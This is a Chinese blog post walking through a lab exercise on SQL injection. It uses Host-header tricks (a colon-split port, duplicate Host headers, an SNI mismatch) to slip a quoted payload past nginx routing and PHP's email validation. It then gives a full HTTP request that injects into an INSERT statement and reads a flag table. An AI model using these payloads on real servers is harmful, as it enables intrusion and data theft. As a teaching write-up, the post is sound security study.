利用Nginx与php处理方式不同绕过Nginx_host实现SQL注入

最新推荐文章于 2024-01-24 14:46:35 发布
最新推荐文章于 2024-01-24 14:46:35 发布
阅读量1k 收藏 2
点赞数 3
分类专栏: 安全 中间件 SQL注入 文章标签: nginx php 运维 网络 linux web安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68163788/article/details/134595825
版权
安全 同时被 3 个专栏收录
125 篇文章 3 订阅
订阅专栏
SQL注入
14 篇文章 0 订阅
订阅专栏
中间件
7 篇文章 1 订阅
订阅专栏

目录

首先需要搭建环境

nginx+php+mysql环境:

搭建网站

FILTER_VALIDATE_EMAIL 绕过

方法1:冒号号分割host字段

方法2:冒号号分割host字段

方法3:SNI扩展绕过

首先需要搭建环境

nginx+php+mysql环境:

php安装包:https://www.php.net/distributions/php-8.2.13.tar.gz

也可以直接使用yum的方式安装:

 yum install php

安装完成后我们可以在www/html/下新建一个php文件查看是否可以正常解析

cat index.php 
<?php phpinfo(); php?>

 

如果看到这样的页面则说明我们的php安装已经成功了

具体的ngixn和mysql安装可以看这里:

Nginx环境搭建

MySQL入门必备:Linux中部署MySQL环境的四种方式详解

搭建网站

(1)下载源码包

这里我分享给大家:

链接:https://pan.baidu.com/s/1267CI6AmiHOBB1TU_4qhMQ?pwd=8848 
提取码:8848

(2)解压源码包

(3)将源码包移动到/usr/local/nginx/html/目录下方便查看我将其重命名为mhz

(4)修改/usr/local/nginx/html/mhz/protected中的config.php文件

(5)在/mhz下创建一个名为web的文件夹用于存放网页

mkdir web

(6)为mhz文件授权

chmod -R 777 mhz/

(7)配置虚拟主机

[root@192~ protected]# vim /etc/nginx/nginx.conf
# 2023.mhz.pw
server {
    listen 80;     
    server_name 2023.mhz.pw;  
    root html/pwnhub/web;
    index index.html index.php;
​
    location / {
        try_files $uri $uri/ /index.php;
        }
 
    location ~ \.php(.*)$ {
            fastcgi_pass   127.0.0.1:9000;
            fastcgi_index  index.php;
            fastcgi_split_path_info  ^((?U).+\.php)(/?.+)$;
            fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
            fastcgi_param  PATH_INFO  $fastcgi_path_info;
            fastcgi_param  PATH_TRANSLATED  $document_root$fastcgi_path_info;
            include        fastcgi_params;
        }
}

(8)设置本地(centos)的DNS

vim /etc/hosts
127.0.0.1   2023.mhz.pw

(9)重启nginx服务

(10)为了在widows上测试,在window的hosts中也写上对应关系

192.168.159.200 2023.mhz.pw

(11)进行数据库的配置

首先在centos中进入到mysql中,创建一个名为security的数据库

create database security;

(12)然后使用该数据库

use security;

创建数据库和表

create databases security;
use security;
SET NAMES utf8;
SET FOREIGN_KEY_CHECKS = 0;
 
DROP TABLE IF EXISTS `flags`;
CREATE TABLE `flags` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `flag` varchar(256) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4;
 
DROP TABLE IF EXISTS `users`;
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(256) NOT NULL,
  `password` varchar(32) NOT NULL,
  `email` varchar(256) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=15 DEFAULT CHARSET=utf8mb4;
 
SET FOREIGN_KEY_CHECKS = 1;

我们可以给数据库中的flag中插入一条flag,后面注入时会用到

insert into flags (flag) value('I_Love_security');

(12)然后我们就可以在浏览器尝试访问2023.mhz.pw

如图所示,成功访问!!!

(13)现在先去注册一个账号

访问页面http://2023.mhz.pw/main/register

到这里网站的搭建就完成了

FILTER_VALIDATE_EMAIL 绕过

我们先看看这个网页的源代码

登录页面的源代码:

 function actionLogin(){
 		//判断传参方式是否为表单的post方法
        if ($_POST) {
        	//数据交给arg()来处理,我们需要去查看arg函数
            $username = arg('username');
            $password = md5(arg('password', ''));
			
            if (empty($username) || empty($password)) {
                $this->error('Username or password is empty.');
            }
			
            $user = new User();
            $data = $user->query("SELECT * FROM `{$user->table_name}` 
                                       WHERE `username` = '{$username}' AND `password` = '{$password}'");
            if (empty($data) or $data[0]['password'] !== $password) {
                $this->error('Username or password is error.');
            }

            $_SESSION['user_id'] = $data[0]['id'];
            $this->jump('/');
        }

    }

#以下为core里面的内容
function escape(&$arg) {
    if(is_array($arg)) {
        foreach ($arg as &$value) {
            escape($value);
        }
    } else {
        $arg = str_replace(["'", '\\', '(', ')'], ["‘", '\\\\', '(', ')'], $arg);
    }
}

function arg($name, $default = null, $trim = false) {
    if (isset($_REQUEST[$name])) {
        $arg = $_REQUEST[$name];
    } elseif (isset($_SERVER[$name])) {
        $arg = $_SERVER[$name];
    } else {
        $arg = $default;
    }
    if($trim) {
        $arg = trim($arg);
    }
	return $arg;
}

从上述代码段内部可以看到:arg函数利用request接收,由于REQUEST被全局过滤函数escape过滤了单引号。所以username,password没法利用。无法使用其作为传入单引号的注入点 

那么再看看注册页面的源代码:

function actionRegister(){
	    if ($_POST) {
	        $username = arg('username');
	        $password = arg('password');

	        if (empty($username) || empty($password)) {
	            $this->error('Username or password is empty.');
            }

            $email = arg('email');
            //利用host字段,拼接用户的邮箱
            if (empty($email)) {
                $email = $username . '@' . arg('HTTP_HOST');
            }
			//用户邮箱的合法性验证 --- 利用了FILTER_VALIDATE_EMAIL函数
            if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
                $this->error('Email error.');
            }

            $user = new User();
            $data = $user->query("SELECT * FROM `{$user->table_name}` WHERE `username` = '{$username}'");
            if ($data) {
                $this->error('This username is exists.');
            }

			
            $ret = $user->create([
                'username' => $username,
                'password' => md5($password),
                'email' => $email
            ]);
            
            if ($ret) {
                $_SESSION['user_id'] = $user->lastInsertId();
            } else {
                $this->error('Unknown error.');
            }
        }

	}

 这里的注册方式是使用create创建的,然后HTTP_HOST是通过Server获取的,Server并没有做任何过滤操作,然后这个FILTER_VALIDATE_EMAIL是用来过滤email的,它把值当做email来进行验证,并且当邮箱地址为空时,它会以username+@HTTP_HOST作为邮箱地址

FILTER_VALIDATE_EMAIL:即,以邮箱的格式对字符串进行检测

RFC 3696规定,邮箱地址分为:local part和domain part两部分。

local part中包含特殊字符,需要如下处理:

  1. 将特殊字符用\转义,如Joe\'Blow@example.com

  2. 或将local part包裹在双引号中,如"Joe'Blow"@example.com

  3. local part长度不超过64个字符

虽然PHP没有完全按照RFC 3696进行检测,但支持上述第2种写法。所以,我们可以利用之绕过FILTER_VALIDATE_EMAIL的检测。

我们可以使用下面这样的方式来尝试将传入的email格式来查看是否可以验证通过:

<?php
$email = xxx@xxx'.com;
var_dump(filter_var($email, FILTER_VALIDATE_EMAIL));

尝试访问后: 

可以看到这样并没有绕过email限制

因为代码中邮箱是用户名、@、Host三者拼接而成,但用户名是经过了转义的,所以单引号只能放在Host中。

我们可以传入用户名为",Host为aaa'"@example.com,最后拼接出来的邮箱为"@aaa'"@example.com

我们可以将上面的邮箱修改为这样的形式就是合法的了:

<?php
$email = "xxx@xxx'.com";//这里的xxx就写用户名和网站
var_dump(filter_var($email, FILTER_VALIDATE_EMAIL));

 可以将web.php文件修改为

<?php
echo $_SERVER['HTTP_HOST'];

来查找HTTP_HOST的值

可以看到这里打印的使我们的域名

然后我们尝试使用抓包的方式抓到注册页面的数据包,并且试着利用上面的方法构造这样的一个Host试试看 

返回的页面为404 notfound,这是因为nginx不知道应该交给哪一个模块进行解析,于是就交给了默认的模块进行处理,而在默认的路径下我们有没有进行这个页面的部署,于是出现了404的返回页面。

可以使用以下三种方式来绕过:

方法1:冒号号分割host字段

Nginx在处理Host的时候,会将Host用冒号分割成hostname和port,port部分被丢弃。

所以,我们可以设置Host的值为2023.mhz.pw:xxx'"@example.com,这样就能访问到目标Server块

nginx处理时会将:后的东西丢弃掉:`2023.mhz.pw

php接收时全部接收:2023.mhz.pw:xxx'"@example.com

​​​​​​​方法2:双写host绕过

当我们传入两个Host头的时候,Nginx将以第一个为准,而PHP-FPM将以第二个为准。

也就是说,如果我传入:

Host: 2023.mhz.pw
Host: xxx'"@example.com

Nginx将认为Host为2023.mhz.pw,并交给目标Server块处理;

但PHP中使用$_SERVER['HTTP_HOST']取到的值却是xxx'"@example.com

注:这种方式在高版本中无法使用,但是低版本可以

方法3:SNI扩展绕过

SNI介绍

早期的SSLv2根据经典的公钥基础设施PKI(Public Key Infrastructure)设计,它默认认为:一台服务器(或者说一个IP)只会提供一个服务,所以在SSL握手时,服务器端可以确信客户端申请的是哪张证书。

但是让人万万没有想到的是,虚拟主机大力发展起来了,这就造成了一个IP会对应多个域名的情况。解决办法有一些,例如申请泛域名证书,对所有*.yourdomain.com的域名都可以认证,但如果你还有一个yourdomain.net的域名,那就不行了。

在HTTP协议中,请求的域名作为主机头(Host)放在HTTP Header中,所以服务器端知道应该把请求引向哪个域名,但是早期的SSL做不到这一点,因为在SSL握手的过程中,根本不会有Host的信息,所以服务器端通常返回的是配置中的第一个可用证书。因而一些较老的环境,可能会产生多域名分别配好了证书,但返回的始终是同一个。

既然问题的原因是在SSL握手时缺少主机头信息,那么补上就是了。

SNI(Server Name Indication)定义在RFC 4366,是一项用于改善SSL/TLS的技术,在SSLv3/TLSv1中被启用。它允许客户端在发起SSL握手请求时(具体说来,是客户端发出SSL请求中的ClientHello阶段),就提交请求的Host信息,使得服务器能够切换到正确的域并返回相应的证书。

要使用SNI,需要客户端和服务器端同时满足条件,幸好对于现代浏览器来说,大部分都支持SSLv3/TLSv1,所以都可以享受SNI带来的便利。

方法3其原理就是,我们在发送https数据包的时候,SNI中指定的域名是example2.com,而无需和HTTP报文中的Host头部保持一致,nginx会选择SNI中的域名作为Server Name

PHP接收的是host头部

Nginx接收的是SNI的域名

上面三种方式都导致mysql报错

Mysql注入

既然已经触发了SQL报错,说明SQL注入近在眼前。通过阅读源码中包含的SQL结构,我们知道flag在flags表中,所以不废话,直接注入读取该表。

插入显示位

因为用户成功登录后,将会显示出该用户的邮箱地址,所以我们可以将数据插入到这个位置。发送如下数据包:

POST /main/register HTTP/1.1
Host: 2023.mhz.pw
Host: '),('t123',md5(12123),(select(flag)from(flags)))#"@a.com
insert into users ...
​
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=--------356678531
Content-Length: 176
​
----------356678531
Content-Disposition: form-data; name="username"
​
"a
----------356678531
Content-Disposition: form-data; name="password"
​
aaa
----------356678531--

可见,我闭合了INSERT语句,并插入了一个新用户t123,并将flag读取到email字段。

登录该用户,则直接获取flag。

未知百分百
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
nginx防护规则,拦截非法字符,防止SQL注入、防XSS,nginx过滤url访问,屏蔽垃圾蜘蛛,WordPress安全代码篇
云博客_资源宝分享
02-18 2979
nginx防护规则,拦截非法字符,防止SQL注入、防XSS,nginx过滤url访问,屏蔽垃圾蜘蛛,WordPress安全代码篇
zabbix监控Nginx/Tomcat/MySQL的详细教程
01-09
zabbix监控Nginx A机器:zabbix服务端(192.168.234.128) B机器:zabbix客户端(192.168.234.125) 在B机器(zabbix客户端)操作: 编辑nginx虚拟主机配置文件: [root@centos ~]# vi /etc/nginx/conf.d/default....
nginx拦截sql注入解决方案
Baron的技术blog
02-23 3103
1.get请求好处理 2 .post请求 由于需要拿到请求体,需要安装lua插件支持 当前方案 : get在server级别处理 post在lication级别处理 if ($query_string ~* ".*('|--|union|insert|drop|truncate|update|from|grant|exec|where|select|and|chr|mid|like|iframe|script|alert|webscan|dbappsecurity|style|WAIT FOR
【运维】利用Nginx进行防SQL注入
weixin_37543485的博客
09-15 1035
Nginx不直接处理SQL注入,但可以在反向代理层面采取一些措施来增强安全性,主要是利用nginx配置文件nginx.conf中server模块,减少SQL注入攻击的风险。将下面的Nginx配置文件代码放入到server块中,然后重启Nginx即可。
Nginx攻击防护、CC防护、防止SQL注入、防XSS的实践配置方法
云博客_资源宝分享
02-13 8996
Nginx攻击防护、CC防护、防止SQL注入、防XSS的实践配置方法
Nginx中防止SQL注入攻击的相关配置介绍
09-30
主要介绍了Nginx中防止SQL注入攻击的相关配置介绍,文中提到的基本思路为将过滤的情况用rewrite重订向到404页面,需要的朋友可以参考下
稻草人PHP系统-PHP
06-21
nginx配置: charset utf-8; location / {  try_files $uri $uri/ /index.php?$query_string; } 稻草人PHP系统 v1.0.3(2020-05-12)更新日志: 1、部份文件重新组织  2、后台JS统一化  3、模型页面配置  4、单表...
php+mysql+yii框架微信公众号点餐系统
09-14
nginx 配置,看根目录的nginx.conf文件 数据库配置 创建数据库weixinorder 导入跟目录下的order.sql文件到数据库 在config/db.php 配置数据库信息 return [ 'class' => 'yii\db\Connection', 'dsn' => '...
phpzhibo:php直播汇聚
03-14
环境准备PHP 7+ MYSQL 5.5以上NGINX 1.7+或阿帕奇需要伪静态Thinkphp安装恢复1,恢复MYSQL 1,数据库文件在DB文件夹下avi.sql,Mysql新建数据库avi,并恢复数据库文件。 2,application目录下,修改database.php配置...
校园小情书小程序表白墙后端-PHP
06-20
注意:本地通过访问127.0.0.1:8000即可访问项目phpmyadmin通过127.0.0.1:8080访问,host为db,把项目目录下的love_wall.sql导入数据库即可如果你是在本地window或者mac开发环境可以直接这样访问,如果是线上的云主机...
Nginx的CRLF注入漏洞的原理
AoaNgzh的博客
04-27 601
攻击者可以将CRLF字符序列注入到HTTP请求的URL、请求头、请求体等位置,从而欺骗Nginx将HTTP请求解析为多个请求,其中第一个请求包含了攻击者注入的CRLF字符序列,之后的请求则包含了攻击者控制的请求内容。Nginx会将此请求解析为两个请求:第一个请求包含了攻击者注入的CRLF字符序列,之后的请求则包含了攻击者控制的请求内容,从而导致恶意脚本被执行。为了避免Nginx的CRLF注入漏洞,应该对HTTP请求中的换行符和回车符进行严格的过滤和验证,避免攻击者注入恶意的CRLF字符序列。
nginx防止sql注入
tianyu00的专栏
03-22 1765
其实nginx不具备防止sql注入的功能,但是nginx可以过滤url  if ($request_uri ~* "(cost\()|(concat\()") {           return 404;   }   if ($request_uri ~* "[+|(%20)]union[+|(%20)]") {           return 404;   }
常见安全漏洞及其解决方案
最新发布
Galaxy_0的博客
01-24 961
1、 SQL注入漏洞漏洞描述:SQL注入被广泛用于非法入侵网站服务器,获取网站控制权。它是应用层上的一种安全漏洞。通常在设计存在缺陷的程序中,对用户输入的数据没有做好过滤,导致恶意用户可以构造一些SQL语句让服务器去执行,从而导致数据库中的数据被窃取,篡改,删除,以及进一步导致服务器被入侵等危害。SQL注入的攻击方式多种多样,较常见的一种方式是提前终止原SQL语句,然后追加一个新的SQL命令。为了使整个构造的字符串符合SQL语句语法,攻击者常用注释标记如“-- ”(注意空格)来终止后面的SQL字符串。
nginx-host绕过实例复现
weixin_57385269的博客
02-16 255
(直接使用burp进行抓包,我们可以直接获取到这里的报错信息,显然SNI机制在这里起到了作用,原因就是我们在刚开始通信时就已经在协商阶段发送给服务器我们的HOST字段,后续的通信nginx不再依赖此字段。于是就导致了这里的注入回显。3,Nginx解析漏洞复现 第3和第2都是文件解析漏洞,只是利用方式不同,第2利用方式为:1.png.php。2,Nginx 文件名逻辑漏洞(CVE-2013-4547) 主要原因是错误地解析了请求的URl
安全基础第十二天:nginx相关配置和nginx-host绕过
weixin_62870380的博客
05-15 1051
nginx的动静分离,nginx的缓存,以及缓存投毒漏洞复现,docker-compose在centos下存在的问题。
nginx-host绕过的三种方式
weixin_42902697的博客
02-08 617
利用host进行注入绕过nginx对host的错误处理
文件上传漏洞? 看这一篇就够了-Nginx解析漏洞 修改后缀绕过前端验证 00%截断 安鸾靶场练习
AAAAAAAAAAAA66的博客
12-31 4285
靶场地址 首页 : 安鸾渗透实战平台 - 安鸾学院 目录 文件上传漏洞利用条件 Nginx解析漏洞 文件上传01 (绕过前端验证) 文件上传02 00%截断​ 文件上传漏洞利用条件 1.可以上传php文件,或者上传的文件可以被解析为php文件 2.可以找的到文件上传后的路径 Nginx解析漏洞 该漏洞与Nginxphp版本无关,属于用户配置不当造成的解析漏洞。 实际上就是由于判断文件后缀出现问题,导致我们可以添加一个/.php 后缀 使得系统解析图片木马为php文..
记:nginx配置文件踩过的一个小坑(nginx配置好之后,只能访问index.php,其他文件都是 file not found)...
weixin_30776545的博客
06-17 1260
记几个常用nginx调试的命令 ps -ef |grep nginx:查看nginx进程的相关信息 find / |grep nginx:查找含nginx的文件及文件夹 netstat -antp |grep :80 : 查看80端口的监听情况 nginx配置好之后,只能访问index.php,访问其他php文件 file not found 如...
nginx 配置phpmyadmin
05-14
要在 Nginx 上配置 PHPMyAdmin,需要遵循以下步骤: 1. 安装 PHPPHPMyAdmin 首先,需要安装 PHPPHPMyAdmin。可以使用以下命令在 Ubuntu 上安装它们: ``` sudo apt-get install php7.0 php7.0-fpm php7.0-mysql phpmyadmin ``` 在安装过程中,会提示您选择 Web 服务器。请选择 `none`。 2. 配置 PHPMyAdmin 接下来,需要配置 PHPMyAdmin。在 Ubuntu 上,PHPMyAdmin 的配置文件位于 `/etc/phpmyadmin/config.inc.php`。打开该文件并进行以下更改: ``` $cfg['Servers'][$i]['host'] = 'localhost'; // 主机名 $cfg['Servers'][$i]['port'] = '3306'; // 端口号 $cfg['Servers'][$i]['auth_type'] = 'cookie'; // 认证类型 $cfg['Servers'][$i]['user'] = 'root'; // 用户名 $cfg['Servers'][$i]['password'] = 'password'; // 密码 $cfg['blowfish_secret'] = '随机字符串'; // 随机字符串 ``` 替换上述值中的每个值,以便与您的系统和数据库设置匹配。 3. 配置 Nginx 最后,需要配置 Nginx,以便允许访问 PHPMyAdmin。打开 Nginx 的配置文件(默认情况下位于 `/etc/nginx/nginx.conf`),并将以下内容添加到您的服务器块中: ``` location /phpmyadmin { root /usr/share/; index index.php; try_files $uri $uri/ /index.php?$args; location ~ ^/phpmyadmin/(doc|sql|setup)/ { deny all; } location ~ /phpmyadmin/(.+\.php)$ { fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } } ``` 保存并关闭文件,然后重新启动 Nginx: ``` sudo systemctl restart nginx ``` 现在,您应该能够通过 `http://your-server-ip/phpmyadmin` 访问 PHPMyAdmin。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

未知百分百

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值